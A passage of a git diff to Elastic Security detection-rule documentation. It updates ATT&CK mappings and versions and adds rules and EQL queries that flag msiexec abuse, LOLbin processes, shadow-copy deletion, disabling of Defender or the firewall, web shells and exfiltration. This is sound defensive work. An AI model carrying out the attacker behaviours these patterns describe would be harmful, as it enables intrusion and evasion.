3c6110f7f3..c024ec36a1 100644 
--- a/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected an AWS API command that, while not inherently su * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc index f731886310..25c21a24d3 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-child-process-of-dns-exe.asciidoc @@ -34,13 +34,13 @@ Identifies an unexpected process spawning from dns.exe, the process responsible * Domain: Endpoint * OS: Windows * Use Case: Threat Detection -* Tactic: Initial Access +* Tactic: Lateral Movement * Resources: Investigation Guide * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -104,10 +104,10 @@ process where host.os.type == "windows" and event.type == "start" and process.pa *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: External Remote Services -** ID: T1133 -** Reference URL: https://attack.mitre.org/techniques/T1133/ +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc index 6371f85129..e0b30db27b 100644 
--- a/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-city-for-an-aws-command.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected AWS command activity that, while not inherently * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc index 635bdc2b92..bd103be201 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-country-for-an-aws-command.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected AWS command activity that, while not inherently * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc index 8d66514698..e48113bca3 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc @@ -30,11 +30,12 @@ Identifies an unexpected executable file being created or modified by a Windows * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -128,3 +129,11 @@ file where host.os.type == "windows" and event.type != "deletion" and ** Name: Exploitation for Defense Evasion ** ID: T1211 ** Reference URL: https://attack.mitre.org/techniques/T1211/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc index 8d32f96bab..3d0ce7456b 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-file-modification-by-dns-exe.asciidoc @@ -33,12 +33,12 @@ Identifies an unexpected file being modified by dns.exe, the process responsible * Domain: Endpoint * OS: Windows * Use Case: Threat Detection -* Tactic: Initial Access +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -74,10 +74,10 @@ file where host.os.type == "windows" and process.name : "dns.exe" and event.type *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: External Remote Services -** ID: T1133 -** Reference URL: https://attack.mitre.org/techniques/T1133/ +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc index 045832505b..aaca916e2d 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-network-activity-from-a-windows-system-binary.asciidoc @@ -32,7 +32,7 @@ Identifies network activity from unexpected system applications. This may indica * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -171,3 +171,19 @@ sequence by process.entity_id with maxspan=5m ** Name: Trusted Developer Utilities Proxy Execution ** ID: T1127 ** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc index 818568d1f6..f01bc0be92 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-persistence-via-services-registry.asciidoc 
@@ -28,10 +28,11 @@ Identifies processes modifying the services registry key directly, instead of th * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -83,3 +84,11 @@ registry where host.os.type == "windows" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc index d4adbf1190..39d62ef086 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-extension.asciidoc @@ -30,7 +30,7 @@ Identifies processes running with unusual extensions that are not typically vali * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -76,3 +76,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc index 975bbf50c7..76ad1e9859 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-for-mssql-service-accounts.asciidoc @@ -29,11 +29,12 @@ Identifies unusual process executions using MSSQL Service accounts, which can in * Domain: Endpoint * OS: Windows * Use Case: Threat Detection -* Tactic: Initial Access +* Tactic: Lateral Movement +* Tactic: Persistence * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -70,13 +71,13 @@ process where event.type == "start" and host.os.type == "windows" and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: Exploit Public-Facing Application -** ID: T1190 -** Reference URL: https://attack.mitre.org/techniques/T1190/ +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ * Tactic: ** Name: Persistence ** ID: TA0003 @@ -85,3 +86,7 @@ process where event.type == "start" and host.os.type == "windows" and ** Name: Server Software Component ** ID: T1505 ** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: SQL Stored Procedures +** ID: T1505.001 +** Reference URL: https://attack.mitre.org/techniques/T1505/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..a8297db120 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc 
@@ -0,0 +1,61 @@ +[[unusual-process-spawned-by-a-host]] +=== Unusual Process Spawned by a Host + +A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..1062b913eb --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc 
@@ -0,0 +1,61 @@ +[[unusual-process-spawned-by-a-parent-process]] +=== Unusual Process Spawned by a Parent Process + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..293a02e66a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc 
@@ -0,0 +1,61 @@ +[[unusual-process-spawned-by-a-user]] +=== Unusual Process Spawned by a User + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc new file mode 100644 index 0000000000..761099cb7c --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc @@ -0,0 +1,58 @@ +[[unusual-process-writing-data-to-an-external-device]] +=== Unusual Process Writing Data to an External Device + +A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc index 3eee8da09c..031cfd1efa 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc @@ -34,7 +34,7 @@ Identifies unusual child processes of Service Host (svchost.exe) that traditiona * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -101,3 +101,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Process Hollowing +** ID: T1055.012 +** Reference URL: https://attack.mitre.org/techniques/T1055/012/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc index 99270b64e4..3499a98c4e 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc @@ -29,7 +29,7 @@ This rule monitors for a sequence of 20 "id" command executions within 1 second * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: 
@@ -45,7 +45,8 @@ This rule monitors for a sequence of 20 "id" command executions within 1 second ---------------------------------- sequence by host.id, process.parent.entity_id with maxspan=1s [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and - process.name == "id" and process.args_count == 2] with runs=20 + process.name == "id" and process.args_count == 2 and + not (process.parent.name == "rpm" or process.parent.args : "/var/tmp/rpm-tmp*")] with runs=20 ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc b/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc index 105313b5bf..cc5b100d46 100644 --- a/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc @@ -32,7 +32,7 @@ An adversary may attempt to get detailed information about the operating system * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc index 6b3a505c1f..6dea75f554 100644 --- a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc @@ -34,11 +34,12 @@ Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve * OS: Windows * Use Case: Threat Detection * Tactic: Impact +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -133,3 +134,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc index e93b4be99d..b8ba948277 100644 --- a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc @@ -30,11 +30,12 @@ Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly * OS: Windows * Use Case: Threat Detection * Tactic: Impact +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -127,3 +128,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc b/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc index 9808e581c4..c2685c9c3f 100644 --- a/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc @@ -34,11 +34,13 @@ Identifies suspicious commands executed via a web server, which may suggest a vu * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Initial Access +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -129,3 +131,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc index 992bde4bff..c705640376 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc @@ -36,7 +36,7 @@ Identifies modifications to the Windows Defender registry settings to disable th * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -136,3 +136,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Indicator Blocking ** ID: T1562.006 ** Reference URL: https://attack.mitre.org/techniques/T1562/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc index 4ae11ea633..1549631859 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc @@ -35,11 +35,12 @@ Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -114,3 +115,15 @@ process where host.os.type == "windows" and event.action == "start" and ** Name: Disable or Modify System Firewall ** ID: T1562.004 ** Reference URL: https://attack.mitre.org/techniques/T1562/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc new file mode 100644 index 0000000000..191f50c871 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc 
@@ -0,0 +1,79 @@ +[[windows-installer-with-suspicious-properties]] +=== Windows Installer with Suspicious Properties + +Identifies the execution of an installer from an archive or with suspicious properties. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files in an attempt to bypass application whitelisting. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Msiexec/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [registry where host.os.type == "windows" and process.name : "msiexec.exe" and + ( + (registry.value : "InstallSource" and + registry.data.strings : ("?:\\Users\\*\\Temp\\Temp?_*.zip\\*", + "?:\\Users\\*\\*.7z\\*", + "?:\\Users\\*\\*.rar\\*")) or + + (registry.value : ("DisplayName", "ProductName") and registry.data.strings : "SetupTest") + )] + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : "msiexec.exe" and + not process.name : "msiexec.exe" and + not (process.executable : ("?:\\Program Files (x86)\\*.exe", "?:\\Program Files\\*.exe") and process.code_signature.trusted == true)] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: 
https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc index d1b6763f18..ccc25fca18 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc @@ -30,12 +30,13 @@ Identifies attempts to enumerate hosts in a network using the built-in Windows n * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -114,3 +115,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Network Share Discovery ** ID: T1135 ** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc index 6338a60565..c3e25090d5 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc 
